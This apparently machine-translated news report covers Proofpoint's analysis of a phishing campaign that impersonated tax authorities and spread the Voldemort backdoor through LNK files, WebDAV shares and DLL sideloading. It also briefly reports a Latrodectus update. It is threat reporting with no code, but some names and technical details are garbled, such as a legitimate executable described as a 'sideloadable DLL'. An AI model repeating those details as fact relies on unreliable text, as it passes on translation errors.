Cybersecurity researchers have discovered a new malware campaign that uses Google Sheets as a control mechanism (C2).
activity, revealed by Proofpoint, starting on August 5, 2024, impersonates the tax authorities of governments in Europe, Asia and the US in order to target more than 70 organizations worldwide with a special tool called Voldemort, which is equipped to collect information and deliver an additional payload .
Target sectors include insurance, aerospace, transportation, academia, finance, technology, manufacturing, healthcare, automotive, hospitality, energy, government, media, manufacturing, telecommunications and welfare organizations.
The suspected cyber espionage campaign has not been attributed to a specific threat actor. As part of the attacks, about 20,000 electronic messages were sent.
These emails are said to originate from tax authorities in the US, UK, France, Germany, Italy, India and Japan, informing recipients of changes to their tax returns and urging them to click on Google AMP Cache URLs that redirect users to an intermediate landing page.
What the page does is check The User-Agent string to determine if the operating system is Windows, and if so, use search-ms: URI protocol handler to display a Windows Shortcut (LNK) file that Adobe Acrobat Reader uses to masquerade as a PDF file in an attempt to trick the victim into launching it.
“When LNK is executed, it will call PowerShell to run Python.exe from the third WebDAV shared folder in the same tunnel (\library\), passing the Python script on the fourth shared folder (\resources\) on the same host as the argument.” – said Proofpoint researchers Tommy Majar, Pim Truerbach and Selena Larson.
“This forces Python to run the script without downloading the files to the computer, and the dependencies are downloaded directly from the WebDAV share.”
The Python script is designed to collect system information and send the data as a Base64-encoded string to the domain controlled by the actor, after which it displays a decoy PDF to the user and downloads a password-protected ZIP file from OpenDrive.
The ZIP archive, on the other hand, contains two files: a legitimate “CiscoCollabHost.exe” executable, which is a sideloadable DLL, and a malicious “CiscoSparkLauncher.dll” (i.e., Voldemort) sideloadable DLL.
Voldemort is a custom backdoor written in C that comes with capabilities to collect information and download next-stage payloads, with the malware using Google Sheets for C2, stealing data and executing commands from operators.
Proofpoint described the activity as belonging to Advanced Persistent Threats (APTs), but carrying a “cybercriminal atmosphere” due to the use of techniques popular in cybercrime.
“Threat objects abuse file scheme URIs to access external file sharing resources to host malware, specifically WebDAV and Server Message Block (SMB). This is done by using the “file://” scheme and pointing to the remote server that hosts the malicious content. “, the researchers said.
This was the approach more and more often common among a family of malware which act as Initial Access Brokers (IABs) such as A thief, DarkGateand XWorm.
Additionally, Proofpoint said it was able to read the contents of the Google Sheet, identifying a total of six victims, including one believed to be either a sandboxer or a “known researcher.”
The campaign has been described as unusual, raising the possibility that threat actors have cast a wide net before targeting a small group of targets. It is also possible that attackers, probably with varying levels of technical expertise, planned to infect multiple organizations.
“While many of the campaign’s characteristics are consistent with cybercriminal threats, we believe it is likely espionage in support of as-yet-unknown end goals,” the researchers said.
“The Frankensteinian amalgamation of intelligent and sophisticated capabilities combined with rudimentary methods and functionality makes it difficult to assess the capability level of a threat actor and pinpoint the ultimate campaign objectives with high confidence.”
The development comes after Netskope Threat Labs discovered an updated version of Latrodectus (version 1.4) that comes with a new C2 endpoint and adds two new backdoor commands that allow it to download shellcode from a specified server and retrieve arbitrary files from a remote location.
“Latrodectus has evolved quite quickly, adding new features to its payload,” Leandro Froes, security researcher said. “Understanding the updates that are applied to the payload allows defenders to maintain automated pipelines appropriately, and to use the information to further explore new options.”
